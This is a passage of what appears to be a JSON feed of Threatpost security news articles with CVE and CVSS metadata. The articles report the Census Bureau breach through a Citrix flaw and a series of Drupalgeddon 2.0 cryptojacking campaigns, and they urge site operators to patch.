\u201cIn coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity.\u201d\n", "cvss3": {}, "published": "2020-09-24T20:47:40", "type": "threatpost", "title": "Feds Hit with Successful Cyberattack, Data Stolen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2020-09-24T20:47:40", "id": "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "href": "https://threatpost.com/feds-cyberattack-data-stolen/159541/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T14:50:21", "description": "Threat actors exploited an [unpatched Citrix flaw](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) to breach the network of the U.S. Census Bureau in January in an attack that was ultimately halted before a backdoor could be installed or sensitive data could be stolen, according [to a report](<https://www.oig.doc.gov/OIGPublications/OIG-21-034-A.pdf>) by a government watchdog organization.\n\nHowever, investigators found that officials were informed of the flaw in its servers and had at least two opportunities to fix it before the attack, mainly due to lack of coordination between teams responsible for different security tasks, according to the report, published Tuesday by the U.S. Department of Commerce Office of Inspector General. The bureau also lagged in its discovery and reporting of the attack after it happened.\n\nThe report details and reviews the incident that occurred on Jan. 11, 2020, when attackers used the publicly available exploit for a critical flaw to target remote-access servers operated by the bureau.\n\nCitrix released a public notice about the zero-day flaw\u2014tracked as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\u2013in December. 
In January, a representative from the bureau\u2019s Computer Incident Response Team (CIRT) attended two meetings in which the flaw was discussed and attendees even received a link to steps to use fixes which already had been issued by Citrix.\n\n\u201cDespite the publicly available notices released in December and attending two meetings on the issue in January, the bureau CIRT did not coordinate with the team responsible for implementing these mitigation steps until after the servers had been attacked,\u201d according to the report. Doing so could have prevented the attack, investigators noted.\n\n## **\u2018Partially Successful\u2019 Attack**\n\nThe Citrix products affected by the flaw\u2013[discovered](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) by Mikhail Klyuchnikov, a researcher at Positive Technologies\u2014are used for application-aware traffic management and secure remote access, respectively. At least 80,000 organizations in 158 countries\u2014about 38 percent in the U.S.\u2014use these products, formerly called NetScaler ADC and Gateway.\n\nThe initial compromise at the Census Bureau was on servers used to provide the bureau\u2019s enterprise staff with remote-access capabilities to production, development and lab networks. The servers did not provide access to 2020 decennial census networks, officials told investigators.\n\n\u201cThe exploit was partially successful, in that the attacker modified user account data on the systems to prepare for remote code execution,\u201d according to the report. \u201cHowever, the attacker\u2019s attempts to maintain access to the system by creating a backdoor into the affected servers were unsuccessful.\u201d\n\nAttackers were able to make unauthorized changes to the remote-access servers, including the creation of new user accounts, investigators reported. 
However, the bureau\u2019s firewalls blocked the attacker\u2019s attempts to establish a backdoor to communicate with the attacker\u2019s external command and control infrastructure.\n\n## **Other Mistakes**\n\nAnother security misstep the bureau took that could have mitigated the attack before it even happened was that it was not conducting vulnerability scanning of the remote-access servers as per federal standards and Commerce Department policy, according to the OIG.\n\n\u201cWe found that the bureau vulnerability scanning team maintained a list of devices to be scanned,\u201d investigators wrote. \u201cHowever, the remote-access servers were not included on the list, and were therefore not scanned. This occurred because the system and vulnerability scanning teams had not coordinated the transfer of system credentials required for credentialed scanning.\u201d\n\nThe bureau also made mistakes after the attack by neither discovering nor reporting the incident in a timely manner, the OIG found.\n\nIT administrators were not aware that servers were compromised until Jan. 28, more than two weeks after the attack, because the bureau was not using a security information and event management tool (SIEM) to proactively alert incident responders of suspicious network traffic, investigators found.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T14:35:49", "type": "threatpost", "title": "Postmortem on U.S. 
Census Hack Exposes Cybersecurity Failures", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-08-19T14:35:49", "id": "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "href": "https://threatpost.com/postmortem-on-u-s-census-hack-exposes-cybersecurity-failures/168814/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:52:31", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. 
Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. 
Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in [May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. Also, a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. 
\u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-06-05T18:24:29", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. 
They achieve this through adding the malicious JavaScript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\nTo make it all happen, the actors behind Kitty have used an open-source mining software for browsers called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 on a server disc.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. 
This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. 
More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:27:29", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Also impacted is Drupal 6 and 8.3.x and 8.4.x releases, said Drupal.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned the MITRE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). 
There is no known public exploit code in the wild and no reports of the vulnerability being exploited.\n\nThe flaw is described as \u201can input validation issue where invalid query parameters could be passed into Drupal webpages,\u201d said Tim Mackey, technology evangelist at Black Duck by Synopsys.\n\nMeanwhile, several Drupal-specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security-oriented content delivery network services, CloudFlare and Fastly, have rolled out solutions to help protect customers.\n\n\u201cThe only effective mitigation we are advising is to upgrade or second best is to put a rule into a WAF,\u201d said Greg Knaddison, a Drupal security team member and product engineer at Card.com.\n\nKnaddison said it\u2019s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said Drupal is not releasing any of the technical aspects of the vulnerability other than that the patch acts as an input filter on web page requests.\n\nMackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. \u201cUnder such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,\u201d he said.\n\nKnaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. \u201cGenerally, input filtering like this is a blunt solution to the problem and not fixing the specific vulnerable code. 
But it gets rid of all kinds of input that might be a problem for code later in the code base,\u201d he said.\n\nKnaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates \u201chundreds of thousands\u201d of sites immediately patched within the first 12 hours the patches were released. \u201cI think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,\u201d he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday\u2019s release of a highly critical patch.\n\nAccording to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. \u201cThis means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,\u201d according to the company.\n", "cvss3": {}, "published": "2018-03-29T15:58:28", "type": "threatpost", "title": "Drupal Issues Highly Critical Patch: Over 1M Sites Vulnerable", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T15:58:28", "id": "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "href": "https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-09-07T08:18:49", "description": "Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. 
Developers have also identified three additional \u201cmoderately critical\u201d vulnerabilities.\n\n\u201cA remote attacker could exploit some of these vulnerabilities to take control of an affected system,\u201d according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US CERT).\n\nThe critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP\u2019s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.\n\nOne of the critical vulnerabilities is tied to the \u201cDefaultMailSystem::mail()\u201d component in Drupal 7 and 8. When using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community. When untrusted input is not sanitized correctly, that could lead to remote code execution.\n\nThis glitch was reported by security researcher and senior web developer [Damien Tournoud](<https://www.drupal.org/user/788032>) with Princeton University.\n\nA second remote code execution bug, reported by Nick Booher, exists in Drupal 9\u2019s Contextual Links module. In Drupal, these modules supply contextual links that allow privileged users to quickly perform tasks related to regions of the page \u2013 without having to navigate to the Admin Dashboard.\n\nHowever, the Contextual Links module doesn\u2019t sufficiently validate the requested contextual links. 
That means that an attacker could launch a remote code execution attack in these links.\n\nOne upside is that an attacker would need certain existing permissions: \u201cthis vulnerability is mitigated by the fact that an attacker must have a role with the permission \u2018access contextual links,'\u201d Drupal said.\n\nDrupal also acknowledged three other \u201cmoderately critical\u201d bugs in its advisory.\n\nThe first is an access bypass bug in the content moderation tool in Drupal 8. Essentially, in some conditions, content moderation fails to check a user\u2019s access to use certain transitions \u2013 potentially allowing access bypass.\n\nAnother open redirect vulnerability in Drupal 7 and 8 allows an external URL injection through URL aliases.\n\nThe path module allows users with the \u2018administer paths\u2019 permission to create pretty URLs for content \u2013 and that means that \u201cIn certain circumstances the user can enter a particular path that triggers an open redirect to a malicious url,\u201d Drupal said.\n\nThe issue is mitigated by the fact that the user needs the administer paths permission to exploit, Drupal said.\n\nFinally, a \u201cmoderately critical\u201d bug in Drupal\u2019s redirect process allows bad actors to trick users into visiting third-party websites.\n\nAccording to Drupal, Drupal core and contributed modules frequently use a \u201cdestination\u201d query string parameter in URLs to redirect users to a new destination after completing an action on the current page.\n\n\u201cUnder certain circumstances, malicious users can use this parameter to construct a URL that will trick users into being redirected to a 3rd party website, thereby exposing the users to potential social engineering attacks,\u201d said Drupal.\n\nAll bugs were fixed, and Drupal advised users to upgrade to the most recent version of Drupal 7 or 8 core.\n\n\u201cMinor versions of Drupal 8 prior to 8.5.x are not supported and do not receive security coverage, so sites 
running older versions should update to the above 8.5.x release immediately. 8.5.x will receive security coverage until May 2019,\u201d the company said.\n\nDrupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6,7, and 8 of Drupal\u2019s CMS platform, which impacted over one million sites running Drupal.\n", "cvss3": {}, "published": "2018-10-20T17:09:46", "type": "threatpost", "title": "Critical RCE Bugs Patched in Drupal 7 and 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-20T17:09:46", "id": "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "href": "https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in questions has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). 
\u201cUsing the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.\u201d\n\n> This [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) outbreak started at the zoo and quickly spread to 400+ other sites. <https://t.co/SNRtysBcsi>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 7, 2018](<https://twitter.com/bad_packets/status/993519523826290688?ref_src=twsrc%5Etfw>)\n\nAs of Tuesday evening, Mursch said he has found more websites that were targeted by the attack, including that of Lenovo, UCLA, and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).\n\n> Sheet has been updated with additional sites. It's not an exhaustive list and is subject to change as this [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign is still ongoing. <https://t.co/AwO2oe1znp>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 8, 2018](<https://twitter.com/bad_packets/status/993644561476894721?ref_src=twsrc%5Etfw>)\n\nThe cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\n\u201cDigging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method,\u201d Mursch wrote. 
\u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.\n\nThat domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a Tweet. However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. 
[pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. 
More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-05-07T16:16:20", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-03T07:11:44", "description": "Hackers have been stealing CPU-cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on the Make-A-Wish International\u2019s [website](<https://worldwish.org/en>) and said it had been active since May. 
Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/19094554/make-a-wish-.png>)\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. \u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available for months, many sites have not updated and remain vulnerable. 
As of June, in fact, more than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts with changing the domain name that hosts the JavaScript miner (which is itself obfuscated). Then, the WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d a Make-A-Wish spokesperson told Threatpost. \u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. 
